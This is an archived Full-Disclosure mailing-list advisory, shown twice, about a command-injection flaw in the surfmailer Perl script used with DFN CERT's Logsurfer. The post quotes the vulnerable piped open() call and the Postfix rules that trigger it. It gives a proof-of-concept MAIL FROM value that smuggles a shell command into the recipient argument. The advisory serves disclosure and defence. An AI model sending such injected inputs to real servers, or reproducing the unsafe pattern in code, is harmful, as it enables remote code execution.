[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] DO NOT USE logsurfer configuration recommended by DFN CERT

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] DO NOT USE logsurfer configuration recommended by DFN CERT
From: "kcope" <kingcope@xxxxxxx>
Date: Wed, 20 Feb 2008 14:19:52 +0100

##Logsurfer default recommendation / configuration Remote Code Execution / 
Injection
##discovered by kcope when securing a box

The Logsurfer program distributed by DFN CERT at 
http://www.dfn-cert.de/eng/logsurf/
has a ridicolous remote code execution bug in one of its mailing scripts when 
it is configured properly :)

>From the Homepage:
---snip---
"
The program "logsurfer" was designed to monitor any text-based logfiles on your
system in realtime. The large amount of loginformation collected
(like all messages handled by the syslog-daemon or logfiles from your
information services FTP, WWW etc.) makes it nearly impossible to check your
logs manually to find any unusual activity. You need a program to do this for 
you.
If you don't want to use a script that checks your logs in certain time 
intervals
(like once a day) then you might be interested in the programs like swatch or 
logsurfer.
"
---snip---

This program is also related to snort in some way.
>From http://www.snort.org/docs/faq/1Q05/node94.html:

---snip---
"
5.9 How do I get Snort to e-mail me alerts?

You can't. Such a process would slow Snort down too much to make it of any use.
Instead, log to syslog and use swatch or logcheck to parse over the plaintext 
logfiles.

With the Logsurfer docs, this might get you on the road to doing something with 
Snort and Logsurfer:

    * http://www.obfuscation.org/emf/logsurfer/snort.txt

JASON HAAR provided an example Swatch (3.1beta) config that emails alerts:

    * http://www.theadamsfamily.net/~erek/snort/snort-swatch.conf.txt

Here are some docs on swatch:

    * http://www.oit.ucsb.edu/~eta/swatch/
    * http://www.stanford.edu/~atkins/swatch
    * http://rr.sans.org/sysadmin/swatch.php
    * http://www.enteract.com/ lspitz/swatch.html
    * http://www.cert.org/security-improvement/implementations/i042.01.html

IDS Center (see FAQ [*]) on Win32 will also mail alerts.
"
---snip---

Using the logsurfer configuration files from 
http://www.obfuscation.org/emf/logsurfer/snort.txt
(as recommended by the snort team) or the default examples from the DFN CERT is 
a very bad idea.
This will open your network open wide because of the use of the "surfmailer" 
script which is 
recommended by the DFN CERT.

The "surfmailer" script from 
"http://www.obfuscation.org/emf/logsurfer/surfmailer"; looks as follows:

--- snip ---
#!/usr/bin/perl
use Getopt::Std;

getopts("S:r:");

my $SUBJECT = $opt_S if defined $opt_S;
my $RECIPIENT = $opt_r if defined $opt_r;

open OUTFILE, "|/usr/sbin/sendmail $RECIPIENT";

print OUTFILE "Subject: $SUBJECT\n\n";
while (<>) {
        print OUTFILE $_;
}
--- snip ---

This perl script does an getopt on the "-r" parameter which comes from the 
logsurfer configuration file
and then an open with a pipe character (duh!) to sendmail (to deliver the 
logsurfer message to a system user).

Now let's take for example the postfix configuration file provided by DFN CERT 
at
ftp://ftp.cert.dfn.de/pub/tools/audit/logsurfer/config-examples/emf/postfix.txt:

---snip---
   ###
   ### The Postfix MTA.
   ###
   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: warning: (.*): hostname (.*) 
verification failed: Host not found' - - - 0
           open "$2 postfix\.*\\[$3\\]" - 1000 3600 300
           report "/usr/local/bin/surfmailer -r root -S \"SMTP connect from 
host with broken DNS: $4 $5\"" "$2 postfix\.*\\[$3\\]"

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: connect from (.*)\[(.*)\]' - - 
- 0
           open "$2 postfix\.*\\[$3\\]\.*$5" - 1000 3600 300
           ignore

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from 
(.*)\[(.*)\]: 554 .* Recipient address rejected: Relay access denied' - - - 0 
ignore

[1]'^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from 
(.*)\[(.*)\]: 455 <(.*)>: Sender address rejected: Domain not found' - - - 0
           rule before
           '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from 
(.*)\[(.*)\]' - '.*' - 60
[2]                report "/usr/local/bin/surfmailer -r root -S \"$2 Sender 
address rejected: Domain not found from $4 $5\"" "$2 postfix\.*\\[$3\\]\.*$5"

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject' - - - 0
           rule before
           '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from 
(.*)\[(.*)\]' - '.*' - 60
                   report "/usr/local/bin/surfmailer -r root -S \"$2 rejected: 
Unknown reasons: $4 $5\"" "$2 postfix\.*\\[$3\\]\.*$5"


   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from (.*)\[(.*)\]' 
- - - 0
           delete "$2 postfix\.*\\[$3\\]\.*$5"

   'postfix/(cleanup|qmgr)' - - - 0 ignore
---snip---


At the line marked by [1] in this configuration file snippet the regular 
expression checks in the system logs for
rejected sender addresses of postfix. if the rule matches a "report" is sent as 
seen at the line marked as [2].
So when a bad guy connects to your postfix server and sends a "MAIL FROM:" line 
to the daemon consisting of the
following string: "\"LOL -r ;touch /tmp/0wned;\""@notexisting.com
the surfmailer script is run with a RECIPIENT of ";touch /tmp/0wned;" the next 
time the logsurfer is checking the logfiles for intrusion.
This RECIPIENT lands directly in the open function of the surfmailer script and 
is executed!

So if you use the "surfmailer" script my advise is to overthink that and write 
your own wrapper.
This is just a configuration issue but can be a hell of a bug, since this can 
be exploited over different services like FTP,SSH,SMTP
(depending on the logsurfer rulesets and the crazyness of the admin).

2008/kcope

-- 
Psssst! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger

##Logsurfer default recommendation / configuration Remote Code Execution / 
Injection
##discovered by kcope when securing a box

The Logsurfer program distributed by DFN CERT at 
http://www.dfn-cert.de/eng/logsurf/
has a ridicolous remote code execution bug in one of its mailing scripts
when it is configured properly :)

>From the Homepage:
---snip---
"
The program "logsurfer" was designed to monitor any text-based logfiles on your
system in realtime. The large amount of loginformation collected
(like all messages handled by the syslog-daemon or logfiles from your
information services FTP, WWW etc.) makes it nearly impossible to check your
logs manually to find any unusual activity. You need a program to do this for 
you.
If you don't want to use a script that checks your logs in certain time 
intervals
(like once a day) then you might be interested in the programs like swatch or 
logsurfer.
"
---snip---

This program is also related to snort in some way.
>From http://www.snort.org/docs/faq/1Q05/node94.html:

---snip---
"
5.9 How do I get Snort to e-mail me alerts?

You can't. Such a process would slow Snort down too much to make it of any use.
Instead, log to syslog and use swatch or logcheck to parse over the plaintext 
logfiles.

With the Logsurfer docs, this might get you on the road to doing something with 
Snort and Logsurfer:

    * http://www.obfuscation.org/emf/logsurfer/snort.txt

JASON HAAR provided an example Swatch (3.1beta) config that emails alerts:

    * http://www.theadamsfamily.net/~erek/snort/snort-swatch.conf.txt

Here are some docs on swatch:

    * http://www.oit.ucsb.edu/~eta/swatch/
    * http://www.stanford.edu/~atkins/swatch
    * http://rr.sans.org/sysadmin/swatch.php
    * http://www.enteract.com/ lspitz/swatch.html
    * http://www.cert.org/security-improvement/implementations/i042.01.html

IDS Center (see FAQ [*]) on Win32 will also mail alerts.
"
---snip---

Using the logsurfer configuration files from 
http://www.obfuscation.org/emf/logsurfer/snort.txt
(as recommended by the snort team) or the default examples from the DFN CERT is 
a very bad idea.
This will open your network open wide because of the use of the "surfmailer" 
script which is 
recommended by the DFN CERT.

The "surfmailer" script from 
"http://www.obfuscation.org/emf/logsurfer/surfmailer"; looks as follows:

--- snip ---
#!/usr/bin/perl
use Getopt::Std;

getopts("S:r:");

my $SUBJECT = $opt_S if defined $opt_S;
my $RECIPIENT = $opt_r if defined $opt_r;

open OUTFILE, "|/usr/sbin/sendmail $RECIPIENT";

print OUTFILE "Subject: $SUBJECT\n\n";
while (<>) {
        print OUTFILE $_;
}
--- snip ---

This perl script does an getopt on the "-r" parameter which comes from the 
logsurfer configuration file
and then an open with a pipe character (duh!) to sendmail (to deliver the 
logsurfer message to a system user).

Now let's take for example the postfix configuration file provided by DFN CERT 
at
ftp://ftp.cert.dfn.de/pub/tools/audit/logsurfer/config-examples/emf/postfix.txt:

---snip---
   ###
   ### The Postfix MTA.
   ###
   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: warning: (.*): hostname (.*) 
verification failed: Host not found' - - - 0
           open "$2 postfix\.*\\[$3\\]" - 1000 3600 300
           report "/usr/local/bin/surfmailer -r root -S \"SMTP connect from 
host with broken DNS: $4 $5\"" "$2 postfix\.*\\[$3\\]"

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: connect from (.*)\[(.*)\]' - - 
- 0
           open "$2 postfix\.*\\[$3\\]\.*$5" - 1000 3600 300
           ignore

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from 
(.*)\[(.*)\]: 554 .* Recipient address rejected: Relay access denied' - - - 0 
ignore

[1]'^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from 
(.*)\[(.*)\]: 455 <(.*)>: Sender address rejected: Domain not found' - - - 0
           rule before
           '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from 
(.*)\[(.*)\]' - '.*' - 60
[2]                report "/usr/local/bin/surfmailer -r root -S \"$2 Sender 
address rejected: Domain not found from $4 $5\"" "$2 postfix\.*\\[$3\\]\.*$5"

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject' - - - 0
           rule before
           '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from 
(.*)\[(.*)\]' - '.*' - 60
                   report "/usr/local/bin/surfmailer -r root -S \"$2 rejected: 
Unknown reasons: $4 $5\"" "$2 postfix\.*\\[$3\\]\.*$5"


   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from (.*)\[(.*)\]' 
- - - 0
           delete "$2 postfix\.*\\[$3\\]\.*$5"

   'postfix/(cleanup|qmgr)' - - - 0 ignore
---snip---


At the line marked by [1] in this configuration file snippet the regular 
expression checks in the system logs for
rejected sender addresses of postfix. if the rule matches a "report" is sent as 
seen at the line marked as [2].
So when a bad guy connects to your postfix server and sends a "MAIL FROM:" line 
to the daemon consisting of the
following string: "\"LOL -r ;touch /tmp/0wned;\""@notexisting.com
the surfmailer script is run with a RECIPIENT of ";touch /tmp/0wned;" the next 
time the logsurfer is checking the logfiles for intrusion.
This RECIPIENT lands directly in the open function of the surfmailer script and 
is executed!

So if you use the "surfmailer" script my advise is to overthink that and write 
your own wrapper.
This is just a configuration issue but can be a hell of a bug, since this can 
be exploited over different services like FTP,SSH,SMTP
(depending on the logsurfer rulesets and the crazyness of the admin).

2008/kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Tarot
Next by Date: Re: [Full-disclosure] Tarot
Previous by thread: Re: [Full-disclosure] Tarot
Next by thread: [Full-disclosure] Advisory SE-2008-01: PunBB Blind Password Recovery Vulnerability
Index(es):
- Date
- Thread